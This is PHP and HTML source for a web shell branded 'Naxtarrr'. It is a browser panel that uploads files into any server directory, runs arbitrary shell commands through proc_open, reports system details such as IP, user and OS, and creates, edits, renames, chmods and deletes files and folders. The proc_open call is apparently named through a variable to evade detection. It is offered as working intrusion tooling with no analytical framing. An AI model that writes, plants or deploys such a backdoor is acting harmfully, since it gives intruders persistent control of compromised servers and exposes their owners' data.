        <div id="toast-default" class="fixed top-0 right-0 z-10 flex items-center w-full max-w-xs p-4 text-gray-500 bg-white rounded-lg shadow-sm dark:text-gray-400 dark:bg-gray-800" role="alert">
            <div class="inline-flex items-center justify-center shrink-0 w-8 h-8 text-green-500 bg-green-100 rounded-lg dark:bg-green-300 dark:text-green-200">
                <svg class="w-6 h-6 text-green-600 dark:text-green-700" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24">
                    <path fill-rule="evenodd" d="M2 12C2 6.477 6.477 2 12 2s10 4.477 10 10-4.477 10-10 10S2 17.523 2 12Zm13.707-1.293a1 1 0 0 0-1.414-1.414L11 12.586l-1.793-1.793a1 1 0 0 0-1.414 1.414l2.5 2.5a1 1 0 0 0 1.414 0l4-4Z" clip-rule="evenodd" />
                </svg>
            </div>
            <div class="ms-3 text-sm font-normal"><?= $_SESSION["success"]; ?></div>
            <button type="button" class="ms-auto -mx-1.5 -my-1.5 bg-white text-gray-400 hover:text-gray-900 rounded-lg focus:ring-2 focus:ring-gray-300 p-1.5 hover:bg-gray-100 inline-flex items-center justify-center h-8 w-8 dark:text-gray-500 dark:hover:text-white dark:bg-gray-800 dark:hover:bg-gray-700" data-dismiss-target="#toast-default" aria-label="Close">
                <span class="sr-only">Close</span>
                <svg class="w-3 h-3" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 14 14">
                    <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="m1 1 6 6m0 0 6 6M7 7l6-6M7 7l-6 6" />
                </svg>
            </button>
        </div>
    <?php
        unset($_SESSION["success"]);
    }

    if (isset($_SESSION["error"])) {
    ?>
        <div id="toast-default" class="fixed top-0 right-0 z-10 flex items-center w-full max-w-xs p-4 text-gray-500 bg-white rounded-lg shadow-sm dark:text-gray-400 dark:bg-gray-800" role="alert">
            <div class="inline-flex items-center justify-center shrink-0 w-8 h-8 text-red-500 bg-red-100 rounded-lg dark:bg-red-300 dark:text-red-200">
                <svg class="w-6 h-6 text-red-800 dark:text-red-700" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24">
                    <path fill-rule="evenodd" d="M2 12C2 6.477 6.477 2 12 2s10 4.477 10 10-4.477 10-10 10S2 17.523 2 12Zm7.707-3.707a1 1 0 0 0-1.414 1.414L10.586 12l-2.293 2.293a1 1 0 1 0 1.414 1.414L12 13.414l2.293 2.293a1 1 0 0 0 1.414-1.414L13.414 12l2.293-2.293a1 1 0 0 0-1.414-1.414L12 10.586 9.707 8.293Z" clip-rule="evenodd" />
                </svg>
            </div>
            <div class="ms-3 text-sm font-normal"><?= $_SESSION["error"]; ?></div>
            <button type="button" class="ms-auto -mx-1.5 -my-1.5 bg-white text-gray-400 hover:text-gray-900 rounded-lg focus:ring-2 focus:ring-gray-300 p-1.5 hover:bg-gray-100 inline-flex items-center justify-center h-8 w-8 dark:text-gray-500 dark:hover:text-white dark:bg-gray-800 dark:hover:bg-gray-700" data-dismiss-target="#toast-default" aria-label="Close">
                <span class="sr-only">Close</span>
                <svg class="w-3 h-3" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 14 14">
                    <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="m1 1 6 6m0 0 6 6M7 7l6-6M7 7l-6 6" />
                </svg>
            </button>
        </div>
    <?php
    }
    ?>

    <!-- Main modal -->
    <div id="authentication-modal" tabindex="-1" aria-hidden="true" class="hidden overflow-y-auto overflow-x-hidden fixed top-0 right-0 left-0 z-50 justify-center items-center w-full md:inset-0 h-[calc(100%-1rem)] max-h-full">
        <div class="relative p-4 w-full max-w-md max-h-full">
            <!-- Modal content -->
            <div class="relative bg-white rounded-lg shadow-sm dark:bg-gray-700">
                <!-- Modal body -->
                <div class="p-4 md:p-5">

                    <form method="get" class="max-w-md mx-auto">
                        <input type="hidden" name="path" value="<?= htmlspecialchars($path) ?>">
                        <label for="default-search" class="mb-2 text-sm font-medium text-gray-900 sr-only dark:text-white">Search</label>
                        <div class="relative">
                            <div class="absolute inset-y-0 start-0 flex items-center ps-3 pointer-events-none">
                                <svg class="w-4 h-4 text-gray-500 dark:text-gray-400" aria-hidden="true"
                                    xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 20 20">
                                    <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
                                        d="m19 19-4-4m0-7A7 7 0 1 1 1 8a7 7 0 0 1 14 0Z" />
                                </svg>
                            </div>
                            <input type="search" id="default-search" name="search"
                                class="block w-full p-4 ps-10 text-sm text-gray-900 border border-gray-300 rounded-lg bg-gray-50 
                   focus:ring-blue-500 focus:border-blue-500 
                   dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white 
                   dark:focus:ring-blue-500 dark:focus:border-blue-500"
                                placeholder="Search files or folders..." value="<?= htmlspecialchars($_GET['search'] ?? '') ?>">
                            <button type="submit"
                                class="text-white absolute end-2.5 bottom-2.5 bg-blue-700 hover:bg-blue-800 
                   focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-4 py-2 
                   dark:bg-blue-600 dark:hover:bg-blue-700 dark:focus:ring-blue-800">
                                Search
                            </button>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>

    <div class="container mx-auto p-4">
        <div data-dial-init class="fixed bottom-5 right-5 z-10 group">
            <div id="speed-dial-menu-default" class="flex flex-col items-center hidden mb-4 space-y-2">
                <button type="button" data-modal-target="authentication-modal" data-modal-toggle="authentication-modal" data-tooltip-target="tooltip-search" data-tooltip-placement="left" class="flex justify-center items-center w-[52px] h-[52px] text-gray-500 hover:text-gray-900 bg-white rounded-full border border-gray-200 dark:border-gray-600 shadow-xs dark:hover:text-white dark:text-gray-400 hover:bg-gray-50 dark:bg-gray-700 dark:hover:bg-gray-600 focus:ring-4 focus:ring-gray-300 focus:outline-none dark:focus:ring-gray-400">
                    <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" viewBox="0 0 24 24">
                        <path stroke="currentColor" stroke-linecap="round" stroke-width="2" d="m21 21-3.5-3.5M17 10a7 7 0 1 1-14 0 7 7 0 0 1 14 0Z" />
                    </svg>
                    <span class="sr-only">Search</span>
                </button>
                <div id="tooltip-search" role="tooltip" class="absolute z-10 invisible inline-block w-auto px-3 py-2 text-sm font-medium text-white transition-opacity duration-300 bg-gray-900 rounded-lg shadow-xs opacity-0 tooltip dark:bg-gray-700">
                    Search
                    <div class="tooltip-arrow" data-popper-arrow></div>
                </div>
                <a href="?path=<?= $path; ?>&action=command" data-tooltip-target="tooltip-command" data-tooltip-placement="left" class="flex justify-center items-center w-[52px] h-[52px] text-gray-500 hover:text-gray-900 bg-white rounded-full border border-gray-200 dark:border-gray-600 dark:hover:text-white shadow-xs dark:text-gray-400 hover:bg-gray-50 dark:bg-gray-700 dark:hover:bg-gray-600 focus:ring-4 focus:ring-gray-300 focus:outline-none dark:focus:ring-gray-400">
                    <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24">
                        <path fill-rule="evenodd" d="M3 4a1 1 0 0 0-1 1v14a1 1 0 0 0 1 1h18a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1H3Zm4.293 5.707a1 1 0 0 1 1.414-1.414l3 3a1 1 0 0 1 0 1.414l-3 3a1 1 0 0 1-1.414-1.414L9.586 12 7.293 9.707ZM13 14a1 1 0 1 0 0 2h3a1 1 0 1 0 0-2h-3Z" clip-rule="evenodd" />
                    </svg>
                    <span class="sr-only">Command</span>
                </a>
                <div id="tooltip-command" role="tooltip" class="absolute z-10 invisible inline-block w-auto px-3 py-2 text-sm font-medium text-white transition-opacity duration-300 bg-gray-900 rounded-lg shadow-xs opacity-0 tooltip dark:bg-gray-700">
                    Command
                    <div class="tooltip-arrow" data-popper-arrow></div>
                </div>
                <a href="?path=<?= $path; ?>&action=infomin" data-tooltip-target="tooltip-information" data-tooltip-placement="left" class="flex justify-center items-center w-[52px] h-[52px] text-gray-500 hover:text-gray-900 bg-white rounded-full border border-gray-200 dark:border-gray-600 dark:hover:text-white shadow-xs dark:text-gray-400 hover:bg-gray-50 dark:bg-gray-700 dark:hover:bg-gray-600 focus:ring-4 focus:ring-gray-300 focus:outline-none dark:focus:ring-gray-400">
                    <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24">
                        <path fill-rule="evenodd" d="M2 12C2 6.477 6.477 2 12 2s10 4.477 10 10-4.477 10-10 10S2 17.523 2 12Zm9.408-5.5a1 1 0 1 0 0 2h.01a1 1 0 1 0 0-2h-.01ZM10 10a1 1 0 1 0 0 2h1v3h-1a1 1 0 1 0 0 2h4a1 1 0 1 0 0-2h-1v-4a1 1 0 0 0-1-1h-2Z" clip-rule="evenodd" />
                    </svg>
                    <span class="sr-only">Information</span>
                </a>
                <div id="tooltip-information" role="tooltip" class="absolute z-10 invisible inline-block w-auto px-3 py-2 text-sm font-medium text-white transition-opacity duration-300 bg-gray-900 rounded-lg shadow-xs opacity-0 tooltip dark:bg-gray-700">
                    Information
                    <div class="tooltip-arrow" data-popper-arrow></div>
                </div>
                <button type="button" id="theme-toggle" data-tooltip-target="tooltip-mode" data-tooltip-placement="left" class="flex justify-center items-center w-[52px] h-[52px] text-gray-500 hover:text-gray-900 bg-white rounded-full border border-gray-200 dark:border-gray-600 shadow-xs dark:hover:text-white dark:text-gray-400 hover:bg-gray-50 dark:bg-gray-700 dark:hover:bg-gray-600 focus:ring-4 focus:ring-gray-300 focus:outline-none dark:focus:ring-gray-400">
                    <svg id="theme-toggle-light-icon" class="hidden w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24">
                        <path fill-rule="evenodd" d="M13 3a1 1 0 1 0-2 0v2a1 1 0 1 0 2 0V3ZM6.343 4.929A1 1 0 0 0 4.93 6.343l1.414 1.414a1 1 0 0 0 1.414-1.414L6.343 4.929Zm12.728 1.414a1 1 0 0 0-1.414-1.414l-1.414 1.414a1 1 0 0 0 1.414 1.414l1.414-1.414ZM12 7a5 5 0 1 0 0 10 5 5 0 0 0 0-10Zm-9 4a1 1 0 1 0 0 2h2a1 1 0 1 0 0-2H3Zm16 0a1 1 0 1 0 0 2h2a1 1 0 1 0 0-2h-2ZM7.757 17.657a1 1 0 1 0-1.414-1.414l-1.414 1.414a1 1 0 1 0 1.414 1.414l1.414-1.414Zm9.9-1.414a1 1 0 0 0-1.414 1.414l1.414 1.414a1 1 0 0 0 1.414-1.414l-1.414-1.414ZM13 19a1 1 0 1 0-2 0v2a1 1 0 1 0 2 0v-2Z" clip-rule="evenodd" />
                    </svg>

                    <svg id="theme-toggle-dark-icon" class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24">
                        <path fill-rule="evenodd" d="M11.675 2.015a.998.998 0 0 0-.403.011C6.09 2.4 2 6.722 2 12c0 5.523 4.477 10 10 10 4.356 0 8.058-2.784 9.43-6.667a1 1 0 0 0-1.02-1.33c-.08.006-.105.005-.127.005h-.001l-.028-.002A5.227 5.227 0 0 0 20 14a8 8 0 0 1-8-8c0-.952.121-1.752.404-2.558a.996.996 0 0 0 .096-.428V3a1 1 0 0 0-.825-.985Z" clip-rule="evenodd" />
                    </svg>
                </button>
                <div id="tooltip-mode" role="tooltip" class="absolute z-10 invisible inline-block w-auto px-3 py-2 text-sm font-medium text-white transition-opacity duration-300 bg-gray-900 rounded-lg shadow-xs opacity-0 tooltip dark:bg-gray-700">
                    <span id="light-text" class="hidden">Light</span>
                    <span id="dark-text">Dark</span>
                    <div class="tooltip-arrow" data-popper-arrow></div>
                </div>
            </div>
            <button type="button" data-dial-toggle="speed-dial-menu-default" aria-controls="speed-dial-menu-default" aria-expanded="false" class="flex items-center justify-center text-white bg-blue-700 rounded-full w-[52px] h-[52px] hover:bg-blue-800 dark:bg-blue-600 dark:hover:bg-blue-700 focus:ring-4 focus:ring-blue-300 focus:outline-none dark:focus:ring-blue-800">
                <svg class="w-5 h-5 transition-transform group-hover:rotate-45" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 18 18">
                    <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M9 1v16M1 9h16" />
                </svg>
                <span class="sr-only">Open actions menu</span>
            </button>
        </div>

        <div class="flex content-center items-center flex-col md:flex-row">
            <a href="<?php echo basename($_SERVER['PHP_SELF']); ?>"><img src="https://naxtarrr.netlify.app/img/Naxtarrr.png" class="h-20 w-auto mt-2"></a>
            <form class="flex content-center flex-col gap-2 min-[460px]:flex-row md:ms-auto max-w-xl mt-4" method="post" enctype="multipart/form-data">
                <input class="file:cursor-pointer dark:file:bg-gray-600 file:h-full file:px-4 file:py-2 file:mr-4 file:border-none dark:file:text-gray-400 file:hover:opacity-75 text-sm text-gray-900 font-medium border border-gray-300 rounded-lg cursor-pointer bg-gray-50 shadow-md dark:text-gray-400 focus:outline-none dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400" type="file" name="nax">
                <button class="text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="submit">
                    Submit
                </button>
            </form>

            <?php
            if (isset($_POST["submit"])) {
                $filename = basename($_FILES["nax"]["name"]);
                $tempname = $_FILES["nax"]["tmp_name"];
                $dest = $path . "/" . $filename;

                if (move_uploaded_file($tempname, $dest)) {
                    $_SESSION["success"] = "File uploaded successfully!";
                    header("Refresh:0; url=?path=" . urlencode($path));
                    exit;
                } else {
                    $_SESSION["error"] = "Upload failed!";
                    header("Refresh:0; url=?path=" . urlencode($path));
                    exit;
                }
            }
            ?>
        </div>

        <div class="flex content-center mt-5 mb-10">
            <div class="inline-block mx-auto bg-gray-50 shadow-md dark:bg-gray-700 p-4 text-sm text-center font-medium text-gray-500 dark:text-gray-400 rounded-lg overflow-auto">

                <?php
                if (isset($_GET["file"]) && !isset($_GET["path"])) {
                    $path = dirname($_GET["file"]);
                }
                $path = str_replace("\\", "/", $path);

                $paths = explode("/", $path);
                echo (!preg_match("/Windows/", $os)) ? "<a class='hover:text-gray-600 dark:hover:text-gray-500' id='dir' href='?path=/'>~</a>" : "";
                foreach ($paths as $id => $pat) {
                    echo "<a class='hover:text-gray-600 dark:hover:text-gray-500' href='?path=";
                    for ($i = 0; $i <= $id; $i++) {
                        echo $paths[$i];
                        if ($i != $id) {
                            echo "/";
                        }
                    }
                    echo "'>$pat</a>/";
                }
                ?>
            </div>
        </div>

        <?php
        if (isset($_GET["action"]) && $_GET["action"] === "infomin") {
        ?>
            <div class="bg-gray-50 shadow-md dark:bg-gray-700 p-4 rounded-lg">
                <h2 class="text-lg font-semibold mb-2">System Information</h2>
                <ul class="list-disc list-inside overflow-auto">
                    <li><strong>Server IP:</strong> <?= ipserv(); ?></li>
                    <li><strong>Server Software:</strong> <?= $_SERVER['SERVER_SOFTWARE'] ?? 'N/A'; ?></li>
                    <li><strong>PHP Version:</strong> <?= phpversion(); ?></li>
                    <li><strong>Current User:</strong> <?= get_current_user(); ?></li>
                    <li><strong>Operating System:</strong> <?= php_uname(); ?></li>
                    <li><strong>Document Root:</strong> <?= $_SERVER['DOCUMENT_ROOT'] ?? 'N/A'; ?></li>
                    <li><strong>Server Port:</strong> <?= $_SERVER['SERVER_PORT'] ?? 'N/A'; ?></li>
                    <li><strong>Server Admin:</strong> <?= $_SERVER['SERVER_ADMIN'] ?? 'N/A'; ?></li>
                    <li><strong>Loaded PHP Modules:</strong> <?= implode(", ", get_loaded_extensions()); ?></li>
                </ul>
            </div>
        <?php
        }

        if (isset($_GET["action"]) && $_GET["action"] === "command") {
        ?>
            <form method="post" action="">
                <div class='mt-4'>
                    <div>
                        <label for="coman" class="block mb-2.5 text-sm font-medium text-gray-900 font-medium dark:text-white">Command:</label>
                        <input type="text" id="coman" name="coman" class="block w-full p-2.5 text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" value="<?php echo (isset($_POST["coman"])) ? htmlspecialchars($_POST["coman"]) : ""; ?>" required>
                        <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="execute">
                            Execute
                        </button>
                    </div>
                </div>
            </form>
            <?php
            if (isset($_POST["execute"])) {
                $coman = $_POST["coman"];
                if (empty($coman)) {
                    echo "<font color='red'>Command is empty</font>";
                } else {

                    echo "<font color='green'>Command: " . htmlspecialchars($coman) . "</font><br>";

                    $ler = "2>&1";
                    if (!preg_match("/" . $ler . "/i", $coman)) {
                        $coman = $coman . " " . $ler;
                    }
                    $komen = $coman;
                    $pr = "proc_open";
                    if (function_exists($pr)) {
                        $tod = @$pr($komen, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $crottz, $path);
                        echo "<pre><textarea rows='25' style='color:lime;' readonly='' class=' block p-2.5 w-full text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500'>
    " . htmlspecialchars(stream_get_contents($crottz[1])) . "</textarea></pre><br>";
                    } else {
                        echo "<font color='orange'>proc_open function is disabled!!</font>";
                    }
                }
            }
        }

        /* FILE ACTIONS */
        if (isset($_GET["path"]) && @$_GET["action"] === "newfile") {
            ?>
            <form method="post" action="">
                <div class='mt-4'>
                    <div class="mb-4">
                        <label for="file_name" class="block mb-2.5 text-sm font-medium text-gray-900 font-medium dark:text-white">New File Name:</label>
                        <input type="text" id="file_name" name="file_name" class="block w-full p-2.5 text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" required>
                    </div>
                    <div>
                        <label for="file_content" class="block mb-2.5 text-sm font-medium text-gray-900 font-medium dark:text-white">File Content:</label>
                        <textarea id="file_content" name="file_content" rows="12" class="block p-2.5 w-full text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500"></textarea>
                        <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="newfile">
                            Create file
                        </button>
                    </div>
                </div>
            </form>
            <?php
            if (isset($_POST["newfile"])) {
                $filename = $_POST["file_name"];
                $content = $_POST["file_content"];

                if (error_log($content, 3, $path . "/" . $filename)) {
                    $_SESSION["success"] = "File created successfully!";
                    header("Refresh:0; url=?path=" . urlencode($path));
                    exit;
                } else {
                    $_SESSION["error"] = "Failed to create file!";
                    header("Refresh:0; url=?path=" . urlencode($path));
                    exit;
                }
            }
        }

        if (isset($_GET["action"]) && $_GET["action"] === "view" && isset($_GET["file"])) {
            $filePath = $path . "/" . $_GET["file"];
            if (file_exists($filePath) && is_file($filePath)) {
                // Capture file output
                ob_start();
                readfile($filePath);
                $fileContent = ob_get_clean();
            ?>
                <div class='mt-4 text-gray-700 dark:text-gray-300'>
                    <h2 class='text-lg font-semibold'>
                        File Content: <code><?= htmlspecialchars($_GET["file"]); ?></code>
                    </h2>
                    <textarea rows="12" class='block p-2.5 w-full text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white focus:outline-none' readonly><?= htmlspecialchars($fileContent); ?></textarea>
                </div>
                <div class="flex gap-x-2 mt-2">
                    <a class="hover:text-gray-600 dark:hover:text-gray-500" href="?path=<?= $_GET['path']; ?>&file=<?= $_GET['file']; ?>&action=edit">Edit</a>
                    <a class="hover:text-gray-600 dark:hover:text-gray-500" href="?path=<?= $_GET['path']; ?>&file=<?= $_GET['file']; ?>&action=renamefile">Rename</a>
                    <a class="hover:text-gray-600 dark:hover:text-gray-500" href="?path=<?= $_GET['path']; ?>&file=<?= $_GET['file']; ?>&action=chmodfile">Chmod</a>
                    <a class="hover:text-gray-600 dark:hover:text-gray-500" href="?path=<?= $_GET['path']; ?>&file=<?= $_GET['file']; ?>&action=deletefile">Delete</a>
                </div>
            <?php
            } else {
            ?>
                <div class='mt-4 text-red-600 font-medium font-medium'>File does not exist or is not readable.</div>
            <?php
            }
        }


        if (isset($_GET["action"]) && $_GET["action"] === "edit" && isset($_GET["file"])) {
            $filePath = $path . "/" . $_GET["file"];
            if (file_exists($filePath) && is_file($filePath) && is_writable($filePath)) {
                ob_start();
                readfile($filePath);
                $fileContent = ob_get_clean();
            ?>
                <form method="post" action="">
                    <div class='mt-4'>
                        <h2 class='text-lg font-semibold'>Edit File: <code><?= htmlspecialchars($_GET["file"]); ?></code></h2>
                        <textarea name="file_content" rows="12" class='block p-2.5 w-full text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white focus:outline-none'><?= htmlspecialchars($fileContent); ?></textarea>
                        <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="editfile">
                            Save Changes
                        </button>
                    </div>
                </form>
                <?php
                if (isset($_POST["editfile"])) {
                    $content = $_POST["file_content"];

                    if (unlink($filePath) && error_log($content, 3, $filePath)) {
                        $_SESSION["success"] = "File updated successfully!";
                        header("Refresh:0; url=?path=" . urlencode($path) . "&file=" . urlencode($_GET["file"]) . "&action=edit");
                        exit;
                    } else {
                        $_SESSION["error"] = "Failed to update file!";
                        header("Refresh:0; url=?path=" . urlencode($path));
                        exit;
                    }
                }
            } else {
                ?>
                <div class='mt-4 text-red-600 font-medium'>File does not exist or is not writable.</div>
            <?php
            }
        }

        if (isset($_GET["action"]) && $_GET["action"] === "renamefile" && isset($_GET["file"])) {
            $filePath = $path . "/" . $_GET["file"];
            if (file_exists($filePath) && is_file($filePath) && is_writable($filePath)) {
            ?>
                <form method="post" action="">
                    <div class='mt-4'>
                        <h2 class='text-lg font-semibold'>Rename File: <code><?= htmlspecialchars($_GET["file"]); ?></code></h2>
                        <input type="text" name="new_name" class="block w-full p-2.5 text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" value="<?= htmlspecialchars($_GET["file"]); ?>" required>
                        <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="renamefile">
                            Rename File
                        </button>
                    </div>
                </form>
                <?php
                if (isset($_POST["renamefile"])) {
                    $newName = $_POST["new_name"];
                    $newPath = $path . "/" . $newName;

                    if (rename($filePath, $newPath)) {
                        $_SESSION["success"] = "File renamed successfully!";
                        header("Refresh:0; url=?path=" . urlencode($path) . "&file=" . $newName . "&action=renamefile");
                        exit;
                    } else {
                        $_SESSION["error"] = "Failed to rename file!";
                        header("Refresh:0; url=?path=" . urlencode($path));
                        exit;
                    }
                }
            } else {
                ?>
                <div class='mt-4 text-red-600 font-medium'>File does not exist or is not writable.</div>
            <?php
            }
        }

        if (isset($_GET["action"]) && $_GET["action"] === "chmodfile" && isset($_GET["file"])) {
            $filePath = $path . "/" . $_GET["file"];
            if (file_exists($filePath) && is_file($filePath) && is_writable($filePath)) {
            ?>
                <form method="post" action="">
                    <div class='mt-4'>
                        <h2 class='text-lg font-semibold'>Chmod File: <code><?= htmlspecialchars($_GET["file"]); ?></code></h2>
                        <input type="text" name="new_perms" class="block w-full p-2.5 text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" value="<?= substr(sprintf('%o', @fileperms($filePath)), -4); ?>" required>
                        <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="chmodfile">
                            Change Permission
                        </button>
                    </div>
                </form>
                <?php
                if (isset($_POST["chmodfile"])) {
                    $newPerms = intval($_POST["new_perms"], 8);

                    if (chmod($filePath, $newPerms)) {
                        $_SESSION["success"] = "Successfully changed permission!";
                        header("Refresh:0; url=?path=" . urlencode($path) . "&file=" . $_GET["file"] . "&action=chmodfile");
                        exit;
                    } else {
                        $_SESSION["error"] = "Failed to changed permission!";
                        header("Refresh:0; url=?path=" . urlencode($path));
                        exit;
                    }
                }
            } else {
                ?>
                <div class='mt-4 text-red-600 font-medium'>File does not exist or is not writable.</div>
            <?php
            }
        }

        if (isset($_GET["action"]) && $_GET["action"] === "deletefile" && isset($_GET["file"])) {
            $filePath = $path . "/" . $_GET["file"];
            if (file_exists($filePath) && is_file($filePath) && is_writable($filePath)) {
                if (unlink($filePath)) {
                    $_SESSION["success"] = "File deleted successfully!";
                    header("Refresh:0; url=?path=" . urlencode($path));
                    exit;
                } else {
                    $_SESSION["error"] = "Failed to delete file!";
                    header("Refresh:0; url=?path=" . urlencode($path));
                    exit;
                }
            } else {
                echo "<div class='mt-4 text-red-600 font-medium'>File does not exist or is not writable.</div>";
            }
        }
        /* END FILE ACTIONS */

        /* FOLDER ACTIONS */
        if (isset($_GET["path"]) && @$_GET["action"] === "newfolder") {
            ?>
            <form method="post" action="">
                <div class='mt-4'>
                    <label for="folder_name" class="block mb-2.5 text-sm font-medium text-gray-900 font-medium dark:text-white">New Folder Name:</label>
                    <input type="text" id="folder_name" name="folder_name" class="block w-full p-2.5 text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" required>
                    <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="newfolder">
                        Create folder
                    </button>
                </div>
            </form>
            <?php
            if (isset($_POST["newfolder"])) {
                $folderName = $_POST["folder_name"];
                $folderPath = $path . "/" . $folderName;

                if (mkdir($folderPath, 0777, true)) {
                    $_SESSION["success"] = "Folder created successfully!";
                    header("Refresh:0; url=?path=" . urlencode($path));
                    exit;
                } else {
                    $_SESSION["error"] = "Failed to create folder!";
                    header("Refresh:0; url=?path=" . urlencode($path));
                    exit;
                }
            }
        }

        if (isset($_GET["action"]) && $_GET["action"] === "renamefolder" && isset($_GET["folder"])) {
            $folderPath = $path . "/" . $_GET["folder"];
            if (file_exists($folderPath) && is_dir($folderPath) && is_writable($folderPath)) {
            ?>
                <form method="post" action="">
                    <div class='mt-4'>
                        <h2 class='text-lg font-semibold'>Rename Folder: <code><?= htmlspecialchars($_GET["folder"]); ?></code></h2>
                        <input type="text" name="new_name" class="block w-full p-2.5 text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" value="<?= htmlspecialchars($_GET["folder"]); ?>" required>
